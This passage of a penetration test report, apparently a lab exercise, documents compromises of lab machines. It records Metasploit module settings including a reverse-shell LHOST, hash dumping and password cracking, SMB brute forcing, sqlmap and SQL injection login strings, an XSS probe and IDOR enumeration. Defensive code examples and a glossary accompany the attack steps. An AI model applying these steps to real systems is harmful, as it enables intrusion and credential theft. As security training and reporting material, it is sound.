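            j = i
            while j < len(times) and (times[j] - times[i]).total_seconds() <= window_s:
                j += 1
            peak = max(peak, j - i)
        if peak >= threshold:
            brute[ip] = peak
    suspicious = [(ev["ip"], ev["user"], ev["method"]) for ev in successes if ev["ip"] in brute]
    return {"brute_force": brute, "suspicious_logins": suspicious}


if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

The single failed guess from 10.10.0.2 stays below the threshold and the key-based login for deploy is left alone; the root login from 172.19.19.10 after six failures in seventeen seconds is the event that should page someone. Feeding /var/log/secure (CentOS) or /var/log/auth.log (Ubuntu) through detect() on a schedule is the minimum monitoring this finding calls for.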
CHALLENGE 5:
Objective:
Exploit one of the vulnerable applications in the machine named ACCOUNTS.
1. Present the hash value of a file named FNB_Trading_Summary.
2. Find the password of a user name Arnold.
IP address of all Machines | Operating system and their versions | Host names | Open ports in respective machine | Services running in all open ports
49154 msrpc
49155 msrpc
49156 msrpc
49157 msrpc
Threat Description:
The remote SSH server is configured to allow weak encryption algorithms
Tools Used:
Greenbone Security Assistant :
The Greenbone Security Assistant is a web application that connects to the OpenVAS Manager
and OpenVAS Administrator to provide for a full-featured user interface for vulnerability
management.
Cain & Abel : Cain & Abel is a password recovery tool for Microsoft Operating Systems. It
allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted
passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP
conversations, decoding scrambled passwords, recovering wireless network keys, revealing
password boxes, uncovering cached passwords and analyzing routing protocols.
Methodology:
Done vulnerability assessment with the help of Greenbone Security Assistant and found the
below attached SSH weak encryption Algorithm supported vulnerability.
Figure 5.1
SSH weak encryption algorithm supported vulnerability result details
Figure 5.2
Searched for the exploit module for freeSSHd as shown below.
Figure 5.3
By using the Kali operating system machine, started the exploit process by opening a command line terminal, typing msfconsole and pressing Enter. This launched msfconsole. Then used the exploit windows/ssh/freesshd_authbypass and typed show options.
Figure 5.4
Typed the show options command, as shown below, to check LHOST, RHOST and RPORT. Then set RHOST and RPORT, set USER_FILE /usr/share/metasploit-framework/data/wordlists/unix_users.txt, and ran exploit.
Figure 5.5
Exploitation output as shown in the figure below.
Figure 5.6
After gaining the meterpreter session, took access of the Windows machine with the help of the shell command.
Figure 5.7
From the Windows command prompt typed the command "dir FNB*.* /s" and searched for the file FNB_Trading_Summary.xls. Then exited from the shell command prompt and downloaded the file from the path given in the screenshot below. Exited from meterpreter, came back to msfconsole and used
Figure 5.7
Then set session 1, ran it, and typed the "hashdump" command, which produced the hash dump of users shown in the screenshot below. Then copied the hashdump into a file Arnold.txt and moved it to the www folder.
Figure 5.7
After getting the hashdump, found the md5sum of the file FNB_Trading_Summary.xls. Then started the Apache service to browse and get the file Arnold.txt.
Figure 5.8
As mentioned above, copied the file to the www folder.
Figure 5.9
Displayed and verified that the content of the hashdump is present in the text file.
Figure 5.10
Installed the Cain & Abel tool to crack the password of Arnold from the hashdump file Arnold.txt and cracked the password, i.e. orange, as shown below.
Figure 5.11
Threat Description:
SQL Injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application’s database server (also commonly referred to as a Relational Database Management System – RDBMS). Since an SQL Injection vulnerability could possibly affect any website or web application that makes use of an SQL-based database, the vulnerability is one of the oldest, most prevalent and most dangerous of web application vulnerabilities.
CONFIDENTIAL
Xsecurity, LLC CONFIDENTIAL Penetration Test Report for FNB Financial Service
Cross-Site Scripting (XSS) is probably the most common singular security vulnerability existing
in web applications at large. It has been estimated that approximately 65% of websites are
vulnerable to an XSS attack in some form, a statistic which should scare you as much as it does
me.
Tools Used:
Methodology: To perform the web application penetration test on FNB’s official website, opened the URL www.fnb.com.
Figure 6.1
Figure 6.2
In the username and password fields typed the string Fnb’ 1=1’ --
Figure 6.3
Was able to perform SQL injection and logged in as the user Smith as shown below.
Figure 6.4
Further, to perform an XSS attack, went to the Contact field of the website, typed Name: customer and inserted a script in the Message field: <script>alert("YOUR SYSTEM IS HACKED XSS")</SCRIPT>
Figure 6.5
Figure 6.6
Recommendation:
Input Validation is any web application’s first line of defense. That said, Input Validation is
limited to knowing what the immediate usage of an untrusted input is and cannot predict where
that input will finally be used when included in output. Practically all free text falls into this
category since we always need to allow for valid uses of quotes, angular brackets and other
characters.
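The recommendation above says that validation cannot know where free text will end up, so the defence has to be applied at the output point. As an added example, not taken from this report or the tested site, the following code renders the contact-form submission from Challenge 6 in a vulnerable form and in a form encoded for the HTML text context, with a small check a reviewer can run over submissions; the template, function names and sample submission are assumed.

```python
"""Contact-form rendering: untrusted text concatenated into HTML versus encoded at output."""
import html
import re

# Constructed sample submission: the probe string recorded in Challenge 6 of this report.
SAMPLE_NAME = "customer"
SAMPLE_MESSAGE = '<script>alert("YOUR SYSTEM IS HACKED XSS")</SCRIPT>'

# Assumed page template; the submission is placed inside HTML element bodies.
PAGE_TEMPLATE = '<h2>Contact</h2><p>From: {name}</p><div class="msg">{message}</div>'


def render_contact_unsafe(name: str, message: str) -> str:
    """Vulnerable pattern: the submission is placed into the page body unchanged."""
    return PAGE_TEMPLATE.format(name=name, message=message)


def render_contact_safe(name: str, message: str) -> str:
    """Hardened pattern: encode for the HTML text context at the point of output.

    Input validation cannot know where free text will end up, so the encoding
    is applied where the context is known, here an HTML element body."""
    return PAGE_TEMPLATE.format(name=html.escape(name, quote=True),
                                message=html.escape(message, quote=True))


# A live <script ...> opening tag in rendered output (case-insensitive, as browsers are).
LIVE_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def has_live_script_tag(rendered: str) -> bool:
    """True when the rendered HTML still contains an opening <script> tag."""
    return LIVE_SCRIPT_TAG.search(rendered) is not None


def flag_submissions(submissions: list) -> list:
    """Return the (name, message) pairs whose message carries script markup, for review."""
    return [(n, m) for n, m in submissions if has_live_script_tag(m)]


if __name__ == "__main__":
    print("unsafe:", render_contact_unsafe(SAMPLE_NAME, SAMPLE_MESSAGE))
    print("safe:  ", render_contact_safe(SAMPLE_NAME, SAMPLE_MESSAGE))
```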
CHALLENGE 7:
Objective:
Exploit the machine named “HRDEPT” and present the hash value of the file “Employee
Details.xlsx”.
IP address of all Machines | Operating system and their respective versions | Host names | Open ports in machine | Services running in all open ports
Threat Description: The content management system used by the HR department is WordPress.
WordPress is a database-backed platform that executes server-side scripts in PHP. Both of these
characteristics can make WordPress vulnerable to malicious URL insertion attacks. Commands
are sent to WordPress via URL parameters, which can be abused by attackers who know how to
construct parameters that WordPress may misinterpret or act on without authorization.
Tools Used: Nessus: Nessus is a remote security scanning tool, which scans a computer and
raises an alert if it discovers any vulnerabilities that malicious hackers could use to gain access to
any computer you have connected to a network.
WPScan: WPScan is a black box WordPress vulnerability scanner.
Methodology:
Performed the vulnerability assessment with the help of the Nessus tool and found the vulnerability
given below.
Figure 7.1
Opened the URL http://172.19.19.6 and found the details given below.
Figure 7.2
Further, entering the project ECSA, found that the content management system used is WordPress.
Figure 7.2
Further viewed the source of the webpage and found the results below.
Figure 7.3
Figure 7.4
Ran the command wpscan --url http://172.19.19.6/ecsa
Figure 7.5
Enumerated plugins from the passive detection and found the inboundio-marketing plugin.
Figure 7.6
Figure 7.7
Then typed the show options command, as shown below, to check the RHOST, RPORT and TARGETURI.
Figure 7.8
Then set the RHOST 172.19.19.6, set the TARGETURI and confirmed with show options.
Figure 7.9
Then set the TARGETURI /ECSA
Figure 7.10
Then done the
Figure 7.11
Figure 7.12
After gaining the Meterpreter session, found the file with the help of the search command search -f "Employee Details.xlsx" -d c:\ and then downloaded it.
Figure 7.13
After downloading the file, extracted the md5sum of the file "Employee Details.xlsx" as shown in the screenshot below.
Figure 7.14
CHALLENGE 8:
Objective:
Extract employee data from the Active Directory machine in the network. You need to
compromise and take control of the AD first.
IP address of all Machines | Operating system and their respective versions | Host names | Open ports in machine | Services running in all open ports
49161 msrpc
49165
Threat Description:
The most severe of the vulnerabilities could allow remote code execution if an attacker sent a
specially crafted SMB packet to a computer running the Server service. Firewall best practices
and standard default firewall configurations can help protect networks from attacks that originate
from outside the enterprise perimeter. Best practices recommend that systems that are connected
to the Internet have a minimal number of ports exposed.
Tools Used:
Nessus : Nessus is a remote security scanning tool, which scans a computer and raises an alert if
it discovers any vulnerabilities that malicious hackers could use to gain access to any computer
you have connected to a network.
Methodology:
Performed the vulnerability assessment with the help of the Nessus tool and found the SMB
vulnerability given below.
Figure 8.1
Used the Nmap tool to brute force the username and password.
Figure 8.2
With the help of nmap --script smb-brute.nse -p445 172.19.19.3 extracted the username and password credentials of the Active Directory server.
Figure 8.3
By using the Kali operating system machine, started the exploit process by opening a command line terminal, and typed
Figure 8.4
Then used the exploit/windows/smb/psexec and typed the show options command to see the module options.
Figure 8.5
Then set the RHOST 172.19.19.3
Figure 8.6
Then set SMBPass mango and SMBUser administrator
Figure 8.7
Set payload
Figure 8.8
Set LHOST
Figure 8.9
Set SMBPass mango and verified with show options
Figure 8.10
Then exploited the machine and gained a meterpreter session. After gaining meterpreter, exported the Active Directory user data with the help of the command line tool csvde -f "Employee Data.csv"
Figure 8.11
Figure 8.12
Find the extracted Employee Data.csv file shown in the screenshot.
Figure 8.13
Recommendation: It is recommended to always follow a standard password policy, i.e. a minimum of 8 characters, alphanumeric with special characters, and non-guessable strong passwords.
CHALLENGE 9:
Objective:
Exploit web applications on the “ENTERTAINMENT” machine and perform the following
post exploitation activities:
1. Present the contact number for a user named Steve on the http://[Host IP]/moviescope
site.
2. Extract the Tables and users of the http://[Host IP]/xsecurity site.
3. Present the SQL server database version on this machine.
IP address of all Machines | Operating system and their respective versions | Host names | Open ports in machine | Services running in all open ports
Threat Description: SQL injection is an attack in which malicious code is inserted into strings
that are later passed to an instance of SQL Server for parsing and execution. Any procedure that
constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server
will execute all syntactically valid queries that it receives. Even parameterized data can be
manipulated by a skilled and determined attacker.
The primary form of SQL injection consists of direct insertion of code into user-input variables
that are concatenated with SQL commands and executed. A less direct attack injects malicious
code into strings that are destined for storage in a table or as metadata. When the stored strings
are subsequently concatenated into a dynamic SQL command, the malicious code is executed.
The injection process works by prematurely terminating a text string and appending a new
command. Because the inserted command may have additional strings appended to it before it is
executed, the malefactor terminates the injected string with a comment mark "--". Subsequent
text is ignored at execution time.
Tools Used:
sqlmap: sqlmap is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over database servers.
Methodology:
CH 9.1 Present the contact number of the user named Steve on http://10.10.0.2/moviescope
Typed the URL http://10.10.0.2/moviescope in the browser, clicked on the login button, typed the string Movie' or 1=1 -- in the username and password fields and logged in.
Figure 9.1.1
With this, got logged in as the user Adam as shown in the illustration below.
Figure 9.1.2
After logging in clicked on the “View Profile” and found the link illustrated below
10.10.0.2/moviescope/viewprofile.aspx?id=1
Figure 9.1.3
Changed the id number from 1 to 2 (10.10.0.2/moviescope/viewprofile.aspx?id=2) and got the profile of John.
Figure 9.1.4
Changed the id number from 2 to 3 (10.10.0.2/moviescope/viewprofile.aspx?id=3) and got the profile of Kety.
Figure 9.1.5
Finally changed the id number from 3 to 4 (10.10.0.2/moviescope/viewprofile.aspx?id=4) and got the profile of Steve, including the contact number of Steve as illustrated below.
Figure 9.1.6
To extract the tables and users, logged into the site http://10.10.0.2/xsecurity as username: abhi and password: abhi
Figure 9.2.1
Figure 9.2.2
Intercepted the URL http://10.10.0.2/xsecurity in Burp Suite and found the illustration below.
Figure 9.2.3
After intercepting in Burp Suite, copied the text in blue and red into a text file xsecurity.txt
Figure 9.2.4
Saved the text file in
Figure 9.2.5
Then ran automatic SQL injection with the help of the sqlmap command: sqlmap -r /root/xsecurity --dbs
Figure 9.2.6
In the illustration below we see the 9 databases extracted, i.e. GoodShopping, Master, model, moviescope, msdb, queenhotel, Real_Home, tempdb, Xsecurity
Figure 9.2.7
Then, with the help of the sqlmap command sqlmap -r /root/xsecurity -D xsecurity --tables, performed SQL injection with the help of the text file xsecurity.txt
Figure 9.2.8
The illustration below shows that sqlmap got a 302 redirect to http://10.10.0.2:8/xsecurity/index.aspx and that txtusername is vulnerable; it also shows the backend database server, operating system and web application technology.
Figure 9.2.9
In the illustration below extracted the 3 tables, i.e. User_Profile, Users, comments, of the database Xsecurity
Figure 9.2.10
With the help of the command given below, further extracted the columns of the xsecurity database
Figure 9.2.11
The illustration shown below has the 3 extracted columns and their types of xsecurity, i.e. password, userid and username
Figure 9.2.12
Figure 9.3.1
Found the illustrated details, i.e. the SQL Server database version is Microsoft SQL Server 2008 (RTM) 10.0.1600.22 (x64)
Figure 9.3.1
Recommendation: Input Validation is any web application’s first line of defense. That said, Input Validation is
limited to knowing what the immediate usage of an untrusted input is and cannot predict where that input will finally
be used when included in output. Practically all free text falls into this category since we always need to allow for
valid uses of quotes, angular brackets and other characters.
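The login bypass in Challenge 6 and Challenge 9, and the profile lookup that exposed Steve's contact number by changing the id, both come down to how the server builds its queries. As an added example that is not code from this report or from the tested applications, the following runs the Challenge 9.1 login string against a string-concatenated query and against a parameterized one, and shows the profile lookup with and without an ownership check; the in-memory SQLite tables, their rows and the function names are assumed and modelled on the Users and User_Profile tables the report enumerates.

```python
"""Login and profile lookups: the injectable pattern beside its parameterized and
access-checked replacements, on an in-memory SQLite copy of the tables this report names."""
import sqlite3

# Constructed sample rows modelled on the Users / User_Profile tables the report enumerates.
# Passwords are plaintext only to keep the queries readable; a real table stores a salted hash.
SAMPLE_USERS = [(1, "Adam", "adam-pass"), (2, "John", "john-pass"),
                (3, "Kety", "kety-pass"), (4, "Steve", "steve-pass")]
SAMPLE_PROFILES = [(1, 1, "Adam", "555-0101"), (2, 2, "John", "555-0102"),
                   (3, 3, "Kety", "555-0103"), (4, 4, "Steve", "555-0104")]

# The login string recorded in Challenge 9.1 of this report.
INJECTION_STRING = "Movie' or 1=1 --"


def make_db() -> sqlite3.Connection:
    """Build the sample database (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (userid INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE User_Profile (id INTEGER PRIMARY KEY, userid INTEGER, "
                 "name TEXT, contact TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO User_Profile VALUES (?, ?, ?, ?)", SAMPLE_PROFILES)
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Vulnerable: input concatenated into the statement. The quote ends the string and
    the trailing -- comments out the password check, so the first row is returned."""
    query = (f"SELECT username FROM Users WHERE username = '{username}' "
             f"AND password = '{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username: str, password: str):
    """Hardened: the driver binds the values, so the input is only ever compared as data."""
    row = conn.execute("SELECT username FROM Users WHERE username = ? AND password = ?",
                       (username, password)).fetchone()
    return row[0] if row else None


def view_profile_vulnerable(conn, requested_id: int):
    """Vulnerable: any caller reads any profile by changing the id (viewprofile.aspx?id=N)."""
    return conn.execute("SELECT name, contact FROM User_Profile WHERE id = ?",
                        (requested_id,)).fetchone()


def view_profile_checked(conn, session_userid: int, requested_id: int):
    """Hardened: the row must belong to the authenticated user, enforced in the query."""
    return conn.execute("SELECT name, contact FROM User_Profile WHERE id = ? AND userid = ?",
                        (requested_id, session_userid)).fetchone()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, INJECTION_STRING, INJECTION_STRING))
    print("parameterized login:", login_parameterized(db, INJECTION_STRING, INJECTION_STRING))
    print("profile 4 as user 1, unchecked:", view_profile_vulnerable(db, 4))
    print("profile 4 as user 1, checked:", view_profile_checked(db, 1, 4))
```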
CHALLENGE 10:
Objective:
Compromise the MySQL database running on the “ECOMM” machine and extract the
table data. The username and password are weak and do not follow best practices.
IP address of all Machines | Operating system and their respective versions | Host names | Open ports in machine | Services running in all open ports
Threat Description:
A vulnerability in the MySQL server could allow potential attackers to access MySQL
databases without supplying proper authentication credentials. An attacker can crack the password
hashes using dictionary attacks and maintain unauthorized access to the server even if this
authentication bypass vulnerability is later fixed.
Tools Used:
HexorBase is a database application designed for administering and auditing multiple database
servers simultaneously from a centralized location, it is capable of performing SQL queries and
bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server,
Oracle, PostgreSQL ). HexorBase allows packet routing through proxies or even metasploit
pivoting antics to communicate with remotely inaccessible servers which are hidden within local
subnets.
Methodology:
With the help of Zenmap we had already found that the MySQL port 3306 is open.
Figure 10.1
Figure 10.2
After opening the HexorBase tool, it prompted for a username and password.
Figure 10.3
Further selected Database Bruteforce, selected MySQL, typed the server IP address, i.e. 10.10.0.3, selected port 3306 and then selected the user list and word list.
Figure 10.4
After selecting the user list and word list, started the dictionary attack and cracked the username and password of the database server, i.e. username: root and password: test
Figure 10.5
Further logged in to the MySQL database server 10.10.0.3 with the help of the cracked username and password.
Figure 10.6
Further extracted the tables from the MySQL database server as illustrated below.
Figure 10.7
Further extracted the tables from the MySQL server as illustrated below.
Figure 10.8
Further extracted the tables from the information schema of the MySQL server as illustrated below.
Figure 10.9
Further extracted the tables from the information schema of the MySQL server as illustrated below.
Figure 10.10
Further extracted the tables from the information schema of the MySQL server as illustrated below.
Figure 10.11
Recommendation: It is recommended to always follow a standard password policy, i.e. a minimum of 8 characters, alphanumeric with special characters, and non-guessable strong passwords.
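The password policy recommended here, and in Challenges 4 and 8, can be checked mechanically. As an added example that is not part of this report, the following code turns that policy (minimum 8 characters, letters plus digits plus a special character, not a guessable word) into a checker and audits the credentials this report recovered; the guessable-word list, the "base word" normalisation that catches variants such as Password1!, the host labels and the one compliant pair are assumptions.

```python
"""Check credentials against the password policy this report recommends."""
import re
import string

# Constructed list of guessable words; it includes the weak values this report found in use.
GUESSABLE_WORDS = {"password", "root", "admin", "administrator", "test", "mango",
                   "orange", "abhi", "welcome", "letmein", "qwerty"}


def base_word(password: str) -> str:
    """Strip leading/trailing digits and punctuation so 'Password1!' still maps to 'password'."""
    return password.strip(string.digits + string.punctuation).lower()


def policy_violations(username: str, password: str) -> list:
    """Return the policy rules a password breaks; an empty list means it complies."""
    problems = []
    if len(password) < 8:
        problems.append("shorter than 8 characters")
    if not re.search(r"[A-Za-z]", password):
        problems.append("no letters")
    if not re.search(r"[0-9]", password):
        problems.append("no digits")
    if not any(ch in string.punctuation for ch in password):
        problems.append("no special character")
    if base_word(password) in GUESSABLE_WORDS:
        problems.append("guessable word")
    if username and username.lower() in password.lower():
        problems.append("contains the username")
    if len(set(password)) < 4:
        problems.append("too few distinct characters")
    return problems


def audit_credentials(findings: list) -> list:
    """Audit (host, username, password) findings; return (host, username, violations) for failures."""
    report = []
    for host, user, pw in findings:
        violations = policy_violations(user, pw)
        if violations:
            report.append((host, user, violations))
    return report


# Constructed audit input: the credentials this report recovered, plus one compliant pair.
SAMPLE_FINDINGS = [
    ("(challenge 4 host)", "root", "password"),
    ("ACCOUNTS", "Arnold", "orange"),
    ("(Active Directory host)", "administrator", "mango"),
    ("ECOMM", "root", "test"),
    ("ENTERTAINMENT", "abhi", "abhi"),
    ("(test host)", "auditor", "Vz7#kq2!Lm9p"),
]

if __name__ == "__main__":
    for host, user, problems in audit_credentials(SAMPLE_FINDINGS):
        print(f"{host} {user}: {'; '.join(problems)}")
```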
CHALLENGE 11:
Objective:
Exploit the machine named as “RDDept” and present the hash value for the RnD NDA.pdf
document.
IP address of all Machines | Operating system and their respective versions | Host names | Open ports in machine | Services running in all open ports
Threat Description: The vulnerability exists in the Media Manager component, which comes by
default in Joomla, allowing arbitrary file uploads, and results in arbitrary code execution.
Tools Used:
Nessus : Nessus is a remote security scanning tool, which scans a computer and raises an alert if it
discovers any vulnerabilities that malicious hackers could use to gain access to any computer you
have connected to a network.
Methodology:
Performed the vulnerability assessment with the help of the Nessus tool and found the vulnerability
given below.
Figure 11.1
Put the URL 172.19.19.9 in the web browser.
Figure 11.2
Further browsed to the project mentioned, ECSA, i.e. 172.19.19.9/ECSA, right clicked and viewed the source of the page.
Figure 11.3
On viewing the source, found that the open source content management system used is Joomla.
Figure 11.4
By using the Kali operating system machine, started the exploit process by opening a command line terminal, typing msfconsole and pressing Enter. This launched msfconsole.
Figure 11.5
After launching msfconsole, searched for the Joomla exploit module.
Figure 11.6
After searching for the Joomla exploit module, used exploit/unix/webapp/joomla_media_upload_exec and ran show options.
Figure 11.7
Then set RHOST 172.19.19.9, set LHOST 192.168.0.5, set TARGETURI /ECSA and verified with show options.
Figure 11.8
Then searched for payloads with the help of command “show payloads”
Figure 11.9
Figure 11.10
Changed the directory path to the root of the C drive and checked the directory listing. Then changed the directory to Users and searched with the help of the command search -f *.pdf in c:\users
Figure 11.11
After finding the file, downloaded it to root and extracted the md5sum of the required file RnD NDA.pdf.
Figure 11.12
Recommendation: Upgrade to the latest version of Joomla, in which public access to the Media Manager is not allowed and a valid username and password must be supplied.
Appendixes
Appendix B: Glossary
Black Box Penetration Test: Black Box testing is used when the organization desires to test internal or external network security from the perspective of an outsider with no knowledge of the organization, other than that which is in the public domain and freely available to anyone. The attacker has no advance knowledge of the organization, except, perhaps, the name of the target. Black box testing most closely simulates what an organization could expect from an outside attack in that, once any discovered vulnerability is exploited and access to the network is gained, the attacker continues to exploit a specific vulnerability as far as possible, with the ultimate goal of obtaining administrative-level access to the vulnerable machine or extending network control to other machines. Because only the first successful vulnerability is exploited, other vulnerabilities within the network go untested and may lead to a false sense of security. Attacks are carried out as covertly as possible. Once the attacks are observed and reported by the target organization, black box testing ceases. Black box testing is also referred to as “no knowledge testing.” It is the most unreliable form of penetration testing.
Crystal Box Penetration Test: Crystal Box testing is used when the organization desires to test internal or external network security from the perspective of an attacker with full and complete knowledge of the organization, similar to the knowledge possessed by an administrator. This knowledge normally includes passwords for routers, firewalls and IDS Systems, network topology, machine configurations and other information that an IT administrator would possess. As many discovered vulnerabilities as possible are exploited within the timeframe specified in the engagement letter. Attacks may be carried out overtly or covertly, as the organization desires. Crystal box testing provides the most thorough assessment of the security posture of the network, in that multiple attack avenues are pursued with detailed knowledge of the organization. Crystal box testing is also referred to as “full knowledge testing” or “white box testing.”
Grey Box Penetration Test: Grey Box testing is used when the organization desires to test internal or external network security from the perspective of an attacker with only limited knowledge of the organization, similar to the knowledge possessed by a non-IT employee. This knowledge normally includes machine names, shared folder names, IP addresses, naming conventions and other information that a normal user with no special access would know about the target organization. As many discovered vulnerabilities as possible are exploited within the timeframe specified in the engagement letter. Attacks may be carried out overtly or covertly, as the organization desires. Grey box testing assures a more thorough assessment of the security posture of the network, in that several possible attack avenues are pursued. Grey box testing is also referred to as “partial knowledge testing.”
Internet Foot Printing: Internet foot printing uses the Internet to search for information in the public domain that could assist an attacker in gaining access to the target’s network. While some information placed in the public domain is required by law, regulation, or to assist in conducting business, excess information in the public domain could result in an attacker gaining enough knowledge to conduct logical, physical or social engineering attacks against the target. Expected results of Internet Footprinting are: location addresses, business hours, telephone and fax numbers, contact names and e-mail addresses; partners; merger/acquisition news; privacy and security policies in place; links to other Web servers; employee names and information; networking equipment used; Web pages using input forms, assigned IP address ranges and Points of Contact, etc.
Penetration Test: The objective of penetration testing is to exploit discovered vulnerabilities to demonstrate that specific vulnerabilities, present in the organization’s network, can be used to compromise network security. It uses intrusion techniques, identical or similar to methods used by attackers to breach network security, collect data and elevate the attacker’s privileges within the network. It can also reveal the extent to which an organization’s security incident response capability is alerted by observing the organization’s response to attack methodologies.
Physical Penetration Testing: See Social Engineering.
Social Engineering: Also called physical penetration testing. Social Engineering includes “successful or unsuccessful attempts to influence a person(s) into either revealing information or acting in a manner that would result in unauthorized access, unauthorized use, or unauthorized disclosure to/of an information system, network or data” using human-based or computer based techniques. In other words, using deception to con someone into providing information or access they would not normally have provided. It’s the “human side” of breaking into a network and preys on the qualities of human nature, such as the desire to be helpful, the tendency to trust people and the fear of getting in trouble. Social engineering can also include the practices of “dumpster diving” (searching the target’s refuse for useful information) and “shoulder surfing” (obtaining passwords by surreptitiously watching a user type in their password).
Vulnerability Assessment: The objective of vulnerability testing is to discover possible attack vectors that can be used to compromise the target network. It is a systematic examination of an information system or product to determine the adequacy of security measures, identify security deficiencies, provide data from which to predict the effectiveness of proposed security measures, and confirm the adequacy of such measures after implementation.